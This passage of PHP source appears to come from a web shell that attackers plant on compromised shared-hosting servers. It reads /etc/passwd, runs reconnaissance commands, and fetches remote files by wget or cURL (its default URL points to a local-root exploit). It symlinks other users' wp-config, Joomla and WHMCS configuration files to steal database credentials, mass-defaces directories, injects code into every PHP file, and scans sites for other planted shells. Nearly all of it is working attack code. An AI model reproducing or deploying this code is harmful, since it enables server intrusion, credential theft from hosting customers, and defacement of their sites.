  1332.                             $purepass = trim($password);
  1333.                             cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1334.                         }
  1335.                     }
  1336.                 }
  1337.             }
  1338.         }
  1339.                
  1340.     echo "</div>";
  1341. }
  1342.  
  1343. function get_users()
  1344. {
  1345.     $userz = array();
  1346.     $user = file("/etc/passwd");
  1347.     foreach($user as $userx=>$usersz)
  1348.     {
  1349.             $userct = explode(":",$usersz);
  1350.             array_push($userz,$userct[0]);
  1351.     }
  1352.     if(!$user)
  1353.     {
  1354.         if($opd = opendir("/home/"))
  1355.         {
  1356.             while(($file = readdir($opd))!== false)
  1357.             {
  1358.                 array_push($userz,$file);
  1359.             }
  1360.         }
  1361.         closedir($opd);
  1362.     }
  1363.     $userz=implode(', ',$userz);
  1364.     return $userz;
  1365. }
  1366.  
  1367. function exploit_details()
  1368. {
  1369.     global $os;
  1370.     echo "<div id=result style='color:green;'><center>
  1371.    <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>
  1372.    OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
  1373.    <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
  1374.    <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr>
  1375.    <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td>
  1376.    <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr>
  1377.    <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>";
  1378.     if(function_exists('apache_get_modules'))
  1379.     {
  1380.     echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
  1381.         echo implode(', ', apache_get_modules());
  1382.         echo "</font></tr></td>";
  1383.     }
  1384.     if($os=='win')
  1385.     {
  1386.         echo  "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr>
  1387.               <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr>
  1388.               ";
  1389.     }
  1390.     if($os=='nix')
  1391.     {
  1392.         echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr>
  1393.              <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr>
  1394.              <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr>
  1395.              <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr>
  1396.              <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr>
  1397.              <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr>
  1398.              <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr>
  1399.              <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
  1400.              <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr>
  1401.              <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>";
  1402.               $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  1403.               $uze=array();
  1404.               foreach($useful as $uzeful)
  1405.               {
  1406.                 if(cmd("which $uzeful"))
  1407.                 {
  1408.                     $uze[]=$uzeful;
  1409.                 }
  1410.               }
  1411.               echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
  1412.               echo implode(', ',$uze);
  1413.               echo "</pre></td></tr>";
  1414.               $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1415.               $uze=array();
  1416.               foreach($downloaders as $downloader)
  1417.               {
  1418.                 if(cmd("which $downloader"))
  1419.                 {
  1420.                     $uze[]=$downloader;
  1421.                 }
  1422.               }
  1423.               echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
  1424.               echo implode(', ',$uze);
  1425.               echo "</pre></td></tr>";
  1426.               echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr>
  1427.                    <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
  1428.     }
  1429.     echo "</table><br /><br /><hr /><br /><br />";
  1430. }
  1431.  
  1432. function remote_file_check_ui()
  1433. {
  1434.     echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />
  1435.          <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>
  1436.          <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php
  1437. ajithkp560.php
  1438. index.html
  1439. profile.php
  1440. c99.php
  1441. r57.php</textarea></td></tr>
  1442.         <tr><td><br /><input type='submit' value='   >>   ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1443. }
  1444.  
  1445. function remote_file_check_bg()
  1446. {
  1447.     set_time_limit(0);
  1448.     $rtr=array();
  1449.     echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
  1450.     $webz=$_POST['rem_web'];
  1451.     $uri_in=$_POST['tryzzz'];
  1452.     $r_xuri = trim($uri_in);
  1453.     $r_xuri=explode("\n", $r_xuri);
  1454.     foreach($r_xuri as $rty)
  1455.     {
  1456.         $urlzzx=$webz.$rty;
  1457.         if(function_exists('curl_init'))
  1458.         {
  1459.             echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1460.             $ch = curl_init($urlzzx);
  1461.             curl_setopt($ch, CURLOPT_NOBODY, true);
  1462.             curl_exec($ch);
  1463.             $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1464.             curl_close($ch);
  1465.             if($status_code==200)
  1466.             {
  1467.                 echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1468.             }
  1469.             else
  1470.             {
  1471.                 echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1472.             }
  1473.         }
  1474.         else
  1475.         {
  1476.             echo "<font color=red>cURL Not Found </font>";
  1477.             break;
  1478.         }
  1479.     }
  1480.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1481. }
  1482.  
  1483. function remote_download_ui()
  1484. {
  1485.     echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=".getcwd()."><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>
  1486.    <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>
  1487.    <tr><td><input type='submit' class='input_big' value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1488. }
  1489.  
  1490. function remote_download_bg()
  1491. {
  1492.     chdir($_GET['path']);
  1493.     global $os;
  1494.     $opt=$_GET['type_r_down'];
  1495.     $rt_ffile=$_GET['rurlfile'];
  1496.     $name=basename($rt_ffile);
  1497.     echo "<div id=result>";
  1498.     switch($opt)
  1499.     {
  1500.         case "WGET":
  1501.             if($os!='win')
  1502.             {
  1503.                 cmd("wget $rt_ffile");
  1504.                 alert("Downloaded Successfully...");
  1505.             }
  1506.             else
  1507.             {
  1508.                 alert("Its Windows OS... WGET is not available");
  1509.             }
  1510.             break;
  1511.         case "cURL":
  1512.             if(function_exists('curl_init'))
  1513.             {
  1514.                 $ch = curl_init($rt_ffile);
  1515.                 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1516.                 $data = curl_exec($ch);
  1517.                 curl_close($ch);
  1518.                 file_put_contents($name, $data);
  1519.                 alert("Download succeeded");
  1520.             }
  1521.             else
  1522.             {
  1523.                 alert("cURL Not Available");
  1524.             }
  1525.             break;
  1526.     }
  1527.     echo "</div>";
  1528. }
  1529.  
  1530. function hex_encode_ui()
  1531. {
  1532.     if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx']))
  1533.     {
  1534.         $tyx=$_POST['tyxxx'];
  1535.         $rezultzz=$_POST['hexinp'];
  1536.         switch($tyx)
  1537.         {
  1538.             case "Encode":
  1539.                 $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz);
  1540.                 echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1541.                <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1542.                <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1543.                Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1544.                 break;
  1545.             case "Decode":
  1546.                 $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz);
  1547.                 echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1548.                <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
  1549.                <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1550.                Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1551.                 break;
  1552.         }
  1553.     }
  1554.     else
  1555.     {
  1556.         echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
  1557.        <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>
  1558.        <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
  1559.        Input : <input name='hexinp' size=50 value='input here'><input type=submit value='   >>  ' /><br /><br /><hr /><br /><br /></div>";
  1560.     }
  1561. }
  1562.  
  1563. function killme()
  1564. {
  1565.     global $self;
  1566.     echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
  1567.     $me=basename($self);
  1568.     unlink($me);
  1569. }
  1570.  
  1571. function ftp_anonymous_ui()
  1572. {
  1573.     echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr /></center><table class=tbl><form method='GET'><tr><td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit'>127.0.0.1
  1574. ftp.google.com
  1575. ftp.r00t.com
  1576. ftp.ajithkp.org
  1577. ...
  1578. ...</textarea></td></tr><tr><td><input class='input_big' type='submit' value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1579. }
  1580.  
  1581. function ftp_anonymous_bg()
  1582. {
  1583.     echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=table>";
  1584.     $ftp_list=$_GET['ftp_anonz'];
  1585.     $xftpl = trim($ftp_list);
  1586.     $xftpl = explode("\n", $xftpl);
  1587.     foreach($xftpl as $xftp)
  1588.     {
  1589.         $xftp = str_replace("ftp://", "", $xftp);
  1590.         $conn_ftp = ftp_connect($xftp);
  1591.         $success = ftp_login($conn_ftp, "anonymous", "");
  1592.         if($success)
  1593.         {
  1594.             echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=green>Successfull</font></td></tr>";
  1595.         }
  1596.         else
  1597.         {
  1598.             echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=red>Failed</font></td></tr>";
  1599.         }
  1600.        
  1601.     }
  1602.     echo "</table><br /><br /><hr /><br /><br />";
  1603. }
  1604.  
  1605. function mass_deface_ui()
  1606. {
  1607.     echo "<div id=result><center><h2>Mass Deface</h2><hr /><br /><br /><table class=tbl><form method='GET'><input name='mm_path' type='hidden' value=".$_GET['path']."><tr><td>Name : <input size=40 name='mass_name'></td></tr>
  1608.    <tr><td><textarea name='mass_cont' cols=80 rows=25 class='textarea_edit'></textarea></td></tr><tr><td><input class='input_big' type=submit value='   >>   ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
  1609. }
  1610.  
  1611. function mass_deface_bg()
  1612. {
  1613.     global $sep;
  1614.     $d_path=$_GET['mm_path'];
  1615.     chdir($d_path);
  1616.     $d_file=$_GET['mass_name'];
  1617.     $d_conten=$_GET['mass_cont'];
  1618.     if(is_dir($d_path))
  1619.     {
  1620.         chdir($d_path);
  1621.         $d_dirs=array();
  1622.         if($handle=opendir($d_path))
  1623.         {
  1624.             while(($item=readdir($handle))!==FALSE)
  1625.             {
  1626.                 if($item=="."){continue;}
  1627.                 if($item==".."){continue;}
  1628.                 if(is_dir($item))
  1629.                 {
  1630.                     array_push($d_dirs, $item);
  1631.                 }
  1632.             }
  1633.         }
  1634.     }
  1635.     echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=tbl>";
  1636.     foreach($d_dirs as $d_dir)
  1637.     {
  1638.         $xd_path=getcwd()."$sep$d_dir$sep$d_file";
  1639.         if(is_writable($d_dir))
  1640.         {
  1641.             $handle=fopen($xd_path, "wb");
  1642.             if($handle)
  1643.             {
  1644.                 fwrite($handle, $d_conten);
  1645.             }
  1646.         }
  1647.         echo "<tr><td><font color=green>$xd_path</font></td></tr>";
  1648.     }
  1649.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1650. }
  1651.  
  1652.  
  1653. function symlinkg($usernamexx,$domainxx)
  1654. {
  1655.         symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt');
  1656.         symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt');
  1657.         symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt');
  1658.         symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt');
  1659.         symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt');
  1660.         symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt');
  1661.         symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt');
  1662.         symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt');
  1663.         symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt');
  1664.         symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt');
  1665.         symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt');
  1666.         symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt');
  1667.         symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt');
  1668.         symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt');
  1669.         symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt');
  1670.         symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt');
  1671.         symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt');
  1672.         symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt');
  1673.         symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt');
  1674.         symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt');
  1675.         symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt');
  1676.         symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt');
  1677.         symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt');
  1678.         symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt');
  1679.         symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt');
  1680.         symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt');
  1681.         symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt');
  1682.         symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt');
  1683.         symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt');
  1684.         symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt');
  1685.         symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt');
  1686. }
  1687.  
  1688. function config_grabber_bg()
  1689. {
  1690.     global $sym_htaccess,$sym_php_ini;
  1691.     mkdir('INDRAJITH', 0777);
  1692.     symlink("/", "INDRAJITH/root");
  1693.     $htaccess=fopen('INDRAJITH/.htaccess', 'wb');
  1694.     fwrite($htaccess,$sym_htaccess);
  1695.     $php_ini_x=fopen('INDRAJITH/php.ini', 'wb');
  1696.     fwrite($php_ini_x, $sym_php_ini);
  1697.     $usr=explode("\n",$_POST['user_z_list']);
  1698.     foreach($usr as $uzer)
  1699.     {
  1700.         $u_er=trim($uzer);
  1701.         symlinggg($u_er);
  1702.     }
  1703.     echo "<script>window.open('INDRAJITH/', '_blank');</script>";
  1704.     alert('Config Grab compted. Check configs in direcory INDRAJITH');
  1705. }
  1706.  
  1707. if(isset($_POST['user_z_list']))
  1708. {
  1709.     config_grabber_bg();
  1710. }
  1711.  
  1712.  
  1713. function config_grabber_ui()
  1714. {
  1715.     if(file('/etc/passwd'))
  1716.     {
  1717.         ?><script>alert("/etc/named.conf Not Found, Its alternative method.");</script><div id=result><center><h2>Config Grabber</h2><hr /><br /><br /><table class=tbl><form method=POST><tr><td><textarea spellcheck=false class='textarea_edit' rows=15 cols=60  name=user_z_list><?php
  1718.         $users = file('/etc/passwd');
  1719.         foreach($users as $user)
  1720.         {
  1721.             $user = explode(':', $user);
  1722.             echo $user[0]."\n";
  1723.         }
  1724.         ?></textarea></td></tr><tr><td><input type='submit' class='input_big' value='   >>   '/></td></tr></form></table><br /><br /><hr /><br /><br /><hr /></div><?php
  1725.     }
  1726.     else
  1727.     {
  1728.         alert(" File Not Found : /etc/passwd ");
  1729.     }
  1730. }
  1731.  
  1732. function symlinggg($user)
  1733. {
  1734.     symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php', "INDRAJITH/".$user." =>blog/configuration.php");
  1735.     symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php");
  1736.     symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php");
  1737.     symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php");
  1738.     symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php");
  1739.     symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php");
  1740.     symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php");
  1741.     symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php");
  1742.     symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php");
  1743.     symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php");
  1744.     symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php");
  1745.     symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php");
  1746.     symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php");
  1747.     symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php");
  1748.     symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php");
  1749.     symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php");
  1750.     symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1751.     symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php");
  1752.     symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php");
  1753.     symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php");
  1754.     symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
  1755.     symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php");
  1756.     symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php");
  1757.     symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php");
  1758.     symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php");
  1759.     symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php");
  1760.     symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php");
  1761.     symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php");
  1762. }
  1763.  
  1764. function sym_xxx()
  1765. {
  1766.     global $sym_htaccess,$sym_php_ini;
  1767.     mkdir('Indrajith', 0777);
  1768.     symlink("/", "Indrajith/root");
  1769.     $htaccess=@fopen('Indrajith/.htaccess', 'w');
  1770.     fwrite($htaccess,$sym_htaccess);
  1771.     $php_ini_x=fopen('Indrajith/php.ini', 'w');
  1772.     fwrite($php_ini_x, $sym_php_ini);
  1773.     $akps = implode(file("/etc/named.conf"));
  1774.     if(!$akps)
  1775.     {
  1776.         config_grabber_ui();
  1777.     }
  1778.     else
  1779.     {
  1780.     $usrd = array();
  1781.     foreach($akps as $akp)
  1782.     {
  1783.         if(eregi("zone", $akp))
  1784.         {
  1785.             preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1786.             flush();
  1787.             if(strlen(trim($akpzz[1][0]))>2)
  1788.             {
  1789.                 $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1790.                 symlinkg($akpzz[1][0],$user['name']);
  1791.                 flush();
  1792.             }
  1793.         }
  1794.     }
  1795.     }
  1796. }
  1797.  
  1798. function sym_link()
  1799. {
  1800.     global $sym_htaccess,$sym_php_ini;
  1801.     cmd('rm -rf AKP');
  1802.     mkdir('AKP', 0755);
  1803.     $usrd = array();
  1804.     $akps = implode(file("/etc/named.conf"));
  1805.     $htaccess=fopen('AKP/.htaccess', 'w');
  1806.     fwrite($htaccess,$sym_htaccess);
  1807.     $php_ini_x=fopen('AKP/php.ini', 'w');
  1808.     fwrite($php_ini_x, $sym_php_ini);
  1809.     symlink("/", "AKP/root");
  1810.     if(!$file)
  1811.     {
  1812.         echo "<script>alert('Bind File /etc/passwd Not Found. Its alternative Method')</script>";
  1813.         echo "<div id=result><center><h2>SymLink</h2></center><hr /><br /><br /><table class='table'><tr><th>Users</th><th>Exploit</th></tr>";
  1814.         $users = file('/etc/passwd');
  1815.         foreach($users as $user)
  1816.         {
  1817.             $user = explode(':', $user);
  1818.             echo "<tr><td>".$user[0]."</td><td><a href='AKP/root/home/".$user[0]."/public_html/' target=_blank>SymLink</tr>";
  1819.         }
  1820.         echo "</table><br /><br /><hr /><br /><br /></div>";
  1821.        
  1822.     }
  1823.     else
  1824.     {
  1825.         echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
  1826.         foreach($akps as $akp)
  1827.         {
  1828.             if(eregi("zone", $akp))
  1829.             {
  1830.                 preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  1831.                 flush();
  1832.                 if(strlen(trim($akpzz[1][0]))>2)
  1833.                 {
  1834.                     $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
  1835.                     echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href='AKP/root/home/".$user['name']."/public_html/' target=_blank>SymLink</a></td></tr></table>";
  1836.                     flush();
  1837.                 }
  1838.             }
  1839.         }
  1840.     }
  1841. }
  1842.  
  1843. function shell_finder_ui()
  1844. {
  1845.     echo "<div id=result><center><h2>SH3LL SCANNER</h2><hr /><br /><br /><br /><form method='GET'>URL : <input size=50 name='sh311_scanx' value='http://www.ajithkp560.hostei.com/PHP/'><input type='submit' value='   >>  ' /></form><br /><br /><hr /><br /><br />";
  1846. }
  1847.  
  1848. function shell_finder_bg()
  1849. {
  1850.     $sh_url=$_GET['sh311_scanx'];
  1851.     echo "<div id=result><center><h2>SHELL SCAN</h2><hr /><br /><br /><table class='table'>";
  1852.     $ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
  1853.     foreach($ShellZ as $shell)
  1854.     {
  1855.         $urlzzx=$sh_url.$shell;
  1856.         if(function_exists('curl_init'))
  1857.         {
  1858.             echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
  1859.             $ch = curl_init($urlzzx);
  1860.             curl_setopt($ch, CURLOPT_NOBODY, true);
  1861.             curl_exec($ch);
  1862.             $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
  1863.             curl_close($ch);
  1864.             if($status_code==200)
  1865.             {
  1866.                 echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
  1867.             }
  1868.             else
  1869.             {
  1870.                 echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
  1871.             }
  1872.         }
  1873.         else
  1874.         {
  1875.             echo "<font color=red>cURL Not Found </font>";
  1876.             break;
  1877.         }
  1878.     }
  1879.     echo "</table><br /><br /><hr /><br /><br /></div>";
  1880. }
  1881.  
  1882. function code_in_ui()
  1883. {
  1884.     global $sep;
  1885.     $mode=$_POST['modexxx'];
  1886.     $ftype=$_POST['ffttype'];
  1887.     $c_cont=$_POST['code_cont'];
  1888.     $ppp=$_POST['path'];
  1889.     if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="")
  1890.     {
  1891.         echo "<div id=result><center><h2>Successfully c0d3 inj3cted</h2></center><table class=tbl>";
  1892.         switch($mode)
  1893.         {
  1894.             case "Apender":
  1895.                 $mmode="a";
  1896.                 break;
  1897.             case "Rewrite":
  1898.                 $mmode="w";
  1899.                 break;
  1900.         }
  1901.         if($handle = opendir($ppp))
  1902.         {
  1903.             while(($c_file = readdir($handle)) !== False)
  1904.             {
  1905.                 if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1))
  1906.                 {
  1907.                     echo "<tr><td><font color=red>$ppp$sep$c_file</font></td></tr>";
  1908.                     $fd = fopen($ppp.$sep.$c_file,$mmode);
  1909.                     if($fd)
  1910.                     {
  1911.                         fwrite($fd,$c_cont);
  1912.                     }
  1913.                     else
  1914.                     {
  1915.                         alert("Error. Access Denied");
  1916.                     }
  1917.                 }
  1918.             }
  1919.         }
  1920.         echo "</table><br /><br /><hr /><br /><br /></div>";
  1921.     }
  1922.     else
  1923.     {
  1924.     ?>
  1925.         <div id=result><center><h2>c0de inj3ct</h2></center><hr /><br /><br /><table class=table><form method='POST'><input type='hidden' name='path' value="<?php echo getcwd(); ?>"><tr><td>Mode : </td>
  1926.         <td><select style='color:green; background-color:black; border:1px solid #666;' name='modexxx'><option>Apender</option><option>Rewrite</option></select></td></tr><tr><td>File Type</td><td><input name='ffttype' value='.php' size=50></td></tr>
